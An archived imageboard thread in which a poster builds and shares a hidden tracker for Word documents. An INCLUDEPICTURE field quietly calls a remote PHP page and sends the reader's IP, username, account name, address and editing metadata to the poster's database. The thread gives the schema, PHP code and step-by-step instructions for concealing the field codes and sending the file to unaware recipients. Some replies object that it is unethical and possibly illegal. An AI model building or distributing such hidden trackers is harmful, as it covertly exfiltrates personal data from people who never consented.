[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y ] [Search | Home]
4Archive logo
Word document tracking
Images are sometimes not shown due to bandwidth/network limitations. Refreshing the page usually helps.

You are currently reading a thread in /g/ - Technology

Thread replies: 33
Thread images: 4
File: IMG_20160115_145058.jpg (719 KB, 2552x2292) Image search: [iqdb] [SauceNao] [Google]
719 KB, 2552x2292
Hey /g/, i'm writing a report for my education and i would like to track who reads, edits, prints, etc. it.
i already made a kind of tracking pixel that's working and i'm able to embed it into the word file, i tested it and it contacts the server upon opening of the document.

Now i discovered that apart from INCLUDEPICTURE there are other word-fields like USERNAME and LASTSAVEDBY.
i should (not tested) be able to use these in the includepicture URL.
I'm looking into somehow escaping/encoding the strings so they don't trip up my server or the db.

I was wondering, how legal/ethical is this and how will normies perceive it when they catch my tracker (alt+F9)?

Hints and tips regarding development are appreciated, i will share the code along the way
Very unethical as they don't give permission to be tracked.

Also, why don't you use Google Docs or something, there you can see who views it etc?
I'm not tracking, i'm logging the requests to my webserver.
Information like last save date and username is metadata and by using microsoft office you are allowing documents to access that info.
I also host the images remotely to decrease file size on disk and in emails (most have 50mb inbox).

As far as permission goes, my document contains this text:


I think it should be their responsibility to disabled auto-loading/interpreting of remote images, if they didn't disable it i see it as them making the request and not my document.
>b-b-but i can't disable it!
Well, you should've used viewer that could.

No google docs because i need to submit it as a file and it needs to work offline.

Relax, it's only metadata, mostly.
I've seen this thread before AND all of the replies so far. Either you're samefagging hard or I'm dejavuing hard.
Bruh, i'm not samefagging.

I have not seen another thread about this, could you link me to some archive?

Did the other OP work out a POC and if yes, can i see it?
>Relax, it's only metadata, mostly.
>we kill people based on metadata
The NSA was only collecting metadata too.
>Errasse humanum est.

I know, that's why i said it.
>i've seen this thread before
>not providing link
this is why you should never trust doc/pdf/anything
aside from the tracking pixel, I don't understand how this works OP but it looks impressive
It includes a php page as a pic, the php page returns a picture.
it gives the $_GET variable to the php page which logs it into the DB.
The username in the URL *should* work like this but it doesn't.

Everything in a smaller fontsize is an example of the metadata i can log.

I'm stuck at using the {USERNAME} in the url, if i get past that i think i can do it.
Literally within 2 minutes of posting this i got past the {USERNAME} in the URL.

I really hope the viewer doesn't press ALT+F9, he knos some programming languages and will know what it is.
Hopefully word blocks ALT+F9 if the document is marked final, is protected against editing and has a digital signature.
File: db_structure.png (45 KB, 654x371) Image search: [iqdb] [SauceNao] [Google]
45 KB, 654x371
MySQL Database structure.


`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`ip_string` text COLLATE utf8_bin,
`ip_long` bigint(20) unsigned NOT NULL,
`last_saved_by` text COLLATE utf8_bin,
`print_date` text COLLATE utf8_bin,
`user_name` text COLLATE utf8_bin,
`user_address` text COLLATE utf8_bin,
`user_initials` text COLLATE utf8_bin,
`save_date` text COLLATE utf8_bin,
`rev_num` int(10) unsigned NOT NULL,
`edit_time` text COLLATE utf8_bin,
`author` text COLLATE utf8_bin,
`tag` text COLLATE utf8_bin,
I realize no-one is lurking here, but i'll share anyway
Fucking bugs, forgot a ? in the query.
This is fixed version:

$qr=$db->prepare('INSERT INTO `tracker_data` '.
'(`ip_string`,`ip_long`,`last_saved_by`,`print_date`,`user_name`,`user_address`,`user_initials`,`save_date`,`rev_num`,`edit_time`,`author`,`tag`) VALUES '.



header("Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate");
header("Expires: Wed, 11 Jan 2000 12:59:00 GMT");
//header("Last-Modified: Wed, 11 Jan 2006 12:59:00 GMT");
header("Pragma: no-cache");
header('Content-Type: image/png');
Honestly I might be tripping. But it seems like I read the same thing a month ago
You ARE tripping because i coded this today, or someone else also invented it before me
Post word document Source photo URL structure pls

Why text and not varchar(255)?
How to deploy:
>execute sql to create table >>52437446
>make php page using php code >>52437844
>upload your image to server
>in word, goto INSERT tab and select FIELD (in Quick Parts dropdown)
>select INCLUDEPICTURE and enter the plain URL to the php page
>check Data not stored in document, optionally check the resize options.
>hit OK
>if you don't see strange field codes like the image, press ALT+F9 (google the shortcut for non-windows)
>place cursor at end of .php and add a ?

add info
>at the end of the url, add l=
>place the cursor just after the =
>insert another field, this time used the lastsavedby field
>tune format settings and confirm insert dialog

>Repeat adding info for the following combinations:
l lastsavedby
p printdate
u username
a useraddress
i userinitials
s savedate
r revnum
e edittime
c author
t (instead of a field place identification tag)

>press ALT+F9 to hide the stuff.
>press CTRL+S
>press CTRL+W
>press CTRL+O and select the document
>goto image place (where you placed the include picture and all the stuff)
>if you see code, right click and select toggle field codes until all gone
>mark as final and digitally sign to prevent editing (and pray for word blocking ALT+F9 this way)
>send to normies
>get their IP's, username, microsoft account display name, microsoft account address (if set), ms account initials, and meta-data that show if they edited it after you.

YOU CANNOT TYPE THE STUFF OUT OF THE PIC, you need to manually add it field by field.

see this post
i was too lazy to enter 255 in the lenght field and i don't know how long it can be
i forgot, after the very last \* in the stuff you need to put MERGEFORMATINET
OP here, can someone confirm this is working?
It works for me but idk if it does for others
I'll manufactur a word .docx for you, wait 20 mins
I've decided to redesign the entire thing, what i posted earlier still works (if you deploy it on your own server).
I'm done with redesign.
I've created a test document and i'm handing it to a normie to test.
>escaping strings
in php using sqlite3 db I escape strings this way
$username = SQLite3::escapeString($_GET[username])

check php documentation to find out how to use it with mysqli
With mysqli you don't need to escape the strings if you use the bind_param() method.

bind_param() does not just insert the string into the query, it actually passes the string into the field in the table.
It's SQL-injection proof, i tried it.
Wanted to add this also:
If you learn yourself to use bind_param() allthe time, you will never forget to escape the strings.
Pray that nobody from the EU opens your file because that kind of tracking has been made illegal last year.
Good to know. Thanks, fαm!

I'm in the EU and everyone who has received a copy of my tracker is aware of the tracking and consented to it.
AFAIK this is subject to mandatory anoy-ifications that read "To provide you better bullshit we use cookies/trackers"
see 2. of the selected answer.

AFAIK this is THE way to do it, i always do it like this:

$data2=419>$data1?"Too high!":"All fine";
$query=$db->prepare('INSERT INTO `table1` (`field1`,`field2`) VALUES (?,?);');
return "u fulin now it bitch";

How do you make your queries?
shit, i meant 219<$data1
Thread replies: 33
Thread images: 4
Thread DB ID: 424932

[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y] [Search | Home]

[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y] [Search | Home]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
This is a 4chan archive - all of the shown content originated from that site. This means that 4Archive shows their content, archived. If you need information for a Poster - contact them.
If a post contains personal/copyrighted/illegal content, then use the post's [Report] link! If a post is not removed within 24h contact me at wtabusse@gmail.com with the post's information.